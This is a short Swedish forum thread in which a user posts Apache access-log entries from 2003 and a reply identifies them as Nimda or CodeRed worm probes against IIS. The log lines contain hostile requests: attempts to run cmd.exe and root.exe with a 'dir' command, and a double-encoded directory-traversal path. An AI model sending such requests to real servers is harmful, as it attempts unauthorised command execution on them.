Det är virus som försöker utnyttja gamla fel i IIS, antingen nimda eller CodeRed.
Eftersom du kör Apache så kan du sitta lugnt.
1 svar · 213 visningar · startad av Nexus86
Vad ska detta betyda?
***.***.***.*** - - [08/Jul/2003:23:15:08 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294
***.***.***.*** - - [08/Jul/2003:23:15:08 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
***.***.***.*** - - [08/Jul/2003:23:15:08 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
***.***.***.*** - - [08/Jul/2003:23:15:08 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
***.***.***.*** - - [08/Jul/2003:23:15:08 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
Är det någon som försöker köra dir genom kommandofönstret eller? 
R// Hittar även en massa annat konstigt i accessloggen.
Det är virus som försöker utnyttja gamla fel i IIS, antingen nimda eller CodeRed.
Eftersom du kör Apache så kan du sitta lugnt.